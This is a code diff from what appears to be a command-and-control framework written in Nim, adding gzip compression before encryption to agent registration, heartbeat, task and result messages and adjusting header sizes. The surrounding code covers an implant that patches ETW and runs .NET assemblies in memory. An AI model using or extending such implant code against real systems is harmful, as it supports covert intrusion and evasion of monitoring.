diff --git a/conquest.nimble b/conquest.nimble index 27accff..f9f95c3 100644 --- a/conquest.nimble +++ b/conquest.nimble @@ -28,4 +28,5 @@ requires "tiny_sqlite >= 0.2.0" requires "prologue >= 0.6.6" requires "winim >= 3.9.4" requires "ptr_math >= 0.3.0" -requires "imguin >= 1.92.2.0" \ No newline at end of file +requires "imguin >= 1.92.2.0" +requires "zippy >= 0.10.16" \ No newline at end of file diff --git a/src/agent/core/clr.nim b/src/agent/core/clr.nim index ec4e685..7f24261 100644 --- a/src/agent/core/clr.nim +++ b/src/agent/core/clr.nim @@ -34,7 +34,6 @@ proc etwPatch(pThreadCtx: PCONTEXT) = Arguments: - assemblyBytes: Serialized .NET assembly - arguments: seq[string] of arguments that should be passed to the function - Returns: CLR Version and assembly output ]# proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[string] = @[]): tuple[assembly, output: string] = diff --git a/src/agent/protocol/heartbeat.nim b/src/agent/protocol/heartbeat.nim index 8a480b8..51928c4 100644 --- a/src/agent/protocol/heartbeat.nim +++ b/src/agent/protocol/heartbeat.nim @@ -1,5 +1,4 @@ -import times - +import times, zippy import ../../common/[types, serialize, sequence, utils, crypto] proc createHeartbeat*(ctx: AgentCtx): Heartbeat = @@ -31,8 +30,11 @@ proc serializeHeartbeat*(ctx: AgentCtx, request: var Heartbeat): seq[byte] = let body = packer.pack() packer.reset() + # Compress payload body + let compressedPayload = compress(body, BestCompression, dfGzip) + # Encrypt check-in / heartbeat request body - let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, body, request.header.seqNr) + let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, compressedPayload, request.header.seqNr) # Set authentication tag (GMAC) request.header.gmac = gmac diff --git a/src/agent/protocol/registration.nim b/src/agent/protocol/registration.nim index f0664d0..42cc894 100644 --- a/src/agent/protocol/registration.nim +++ b/src/agent/protocol/registration.nim @@ -1,4 +1,4 @@ -import winim, os, net, strformat, strutils, registry, sugar +import winim, os, net, strformat, strutils, registry, zippy import ../../common/[types, serialize, sequence, crypto, utils] @@ -241,8 +241,11 @@ proc serializeRegistrationData*(ctx: AgentCtx, data: var AgentRegistrationData): let metadata = packer.pack() packer.reset() + # Compress payload body + let compressedPayload = compress(metadata, BestCompression, dfGzip) + # Encrypt metadata - let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, metadata, data.header.seqNr) + let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, compressedPayload, data.header.seqNr) # Set authentication tag (GMAC) data.header.gmac = gmac diff --git a/src/agent/protocol/result.nim b/src/agent/protocol/result.nim index a0d52bc..4344dfe 100644 --- a/src/agent/protocol/result.nim +++ b/src/agent/protocol/result.nim @@ -1,4 +1,4 @@ -import times, sugar +import times, zippy import ../../common/[types, serialize, sequence, crypto, utils] proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, resultData: seq[byte]): TaskResult = @@ -44,8 +44,11 @@ proc serializeTaskResult*(ctx: AgentCtx, taskResult: var TaskResult): seq[byte] let body = packer.pack() packer.reset() + # Compress payload + let compressedPayload = compress(body, BestCompression, dfGzip) + # Encrypt result body - let (encData, gmac) = encrypt(ctx.sessionKey, taskResult.header.iv, body, taskResult.header.seqNr) + let (encData, gmac) = encrypt(ctx.sessionKey, taskResult.header.iv, compressedPayload, taskResult.header.seqNr) # Set authentication tag (GMAC) taskResult.header.gmac = gmac diff --git a/src/agent/protocol/task.nim b/src/agent/protocol/task.nim index b63f4c7..bb032fb 100644 --- a/src/agent/protocol/task.nim +++ b/src/agent/protocol/task.nim @@ -1,4 +1,4 @@ -import strutils, tables, json, strformat, sugar +import strutils, tables, json, strformat, zippy import ./result import ../../modules/manager @@ -20,11 +20,14 @@ proc deserializeTask*(ctx: AgentCtx, bytes: seq[byte]): Task = validatePacket(header, cast[uint8](MSG_TASK)) # Decrypt payload - let payload = unpacker.getBytes(int(header.size)) - let decData= validateDecryption(ctx.sessionKey, header.iv, payload, header.seqNr, header) + let compressedPayload = unpacker.getBytes(int(header.size)) + let decData = validateDecryption(ctx.sessionKey, header.iv, compressedPayload, header.seqNr, header) + + # Decompress payload + let payload = uncompress(decData, dfGzip) # Deserialize decrypted data - unpacker = Unpacker.init(Bytes.toString(decData)) + unpacker = Unpacker.init(Bytes.toString(payload)) let taskId = unpacker.getUint32() diff --git a/src/server/protocol/packer.nim b/src/server/protocol/packer.nim index 8b71749..e3c117c 100644 --- a/src/server/protocol/packer.nim +++ b/src/server/protocol/packer.nim @@ -1,4 +1,4 @@ -import strutils, streams, times, tables +import strutils, streams, times, tables, zippy import ../../common/[types, utils, serialize, sequence, crypto] proc serializeTask*(cq: Conquest, task: var Task): seq[byte] = @@ -19,14 +19,17 @@ proc serializeTask*(cq: Conquest, task: var Task): seq[byte] = let payload = packer.pack() packer.reset() + # Compress payload body + let compressedPayload = compress(payload, BestCompression, dfGzip) + # Encrypt payload body - let (encData, gmac) = encrypt(cq.agents[Uuid.toString(task.header.agentId)].sessionKey, task.header.iv, payload, task.header.seqNr) + let (encData, gmac) = encrypt(cq.agents[Uuid.toString(task.header.agentId)].sessionKey, task.header.iv, compressedPayload, task.header.seqNr) # Set authentication tag (GMAC) task.header.gmac = gmac # Serialize header - let header = packer.serializeHeader(task.header, uint32(payload.len)) + let header = packer.serializeHeader(task.header, uint32(encData.len)) return header & encData @@ -40,11 +43,14 @@ proc deserializeTaskResult*(cq: Conquest, resultData: seq[byte]): TaskResult = validatePacket(header, cast[uint8](MSG_RESULT)) # Decrypt payload - let payload = unpacker.getBytes(int(header.size)) - let decData= validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header) + let compressedPayload = unpacker.getBytes(int(header.size)) + let decData = validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, compressedPayload, header.seqNr, header) + + # Decompress payload + let payload = uncompress(decData, dfGzip) # Deserialize decrypted data - unpacker = Unpacker.init(Bytes.toString(decData)) + unpacker = Unpacker.init(Bytes.toString(payload)) let taskId = unpacker.getUint32() @@ -82,11 +88,14 @@ proc deserializeNewAgent*(cq: Conquest, data: seq[byte]): Agent = let sessionKey = deriveSessionKey(cq.keyPair, agentPublicKey) # Decrypt payload - let payload = unpacker.getBytes(int(header.size)) - let decData= validateDecryption(sessionKey, header.iv, payload, header.seqNr, header) + let compressedPayload = unpacker.getBytes(int(header.size)) + let decData = validateDecryption(sessionKey, header.iv, compressedPayload, header.seqNr, header) + + # Decompress payload + let payload = uncompress(decData, dfGzip) # Deserialize decrypted data - unpacker = Unpacker.init(Bytes.toString(decData)) + unpacker = Unpacker.init(Bytes.toString(payload)) let listenerId = unpacker.getUint32() @@ -128,11 +137,14 @@ proc deserializeHeartbeat*(cq: Conquest, data: seq[byte]): Heartbeat = validatePacket(header, cast[uint8](MSG_HEARTBEAT)) # Decrypt payload - let payload = unpacker.getBytes(int(header.size)) - let decData= validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header) + let compressedPayload = unpacker.getBytes(int(header.size)) + let decData = validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, compressedPayload, header.seqNr, header) + + # Decompress payload + let payload = uncompress(decData, dfGzip) # Deserialize decrypted data - unpacker = Unpacker.init(Bytes.toString(decData)) + unpacker = Unpacker.init(Bytes.toString(payload)) return Heartbeat( header: header,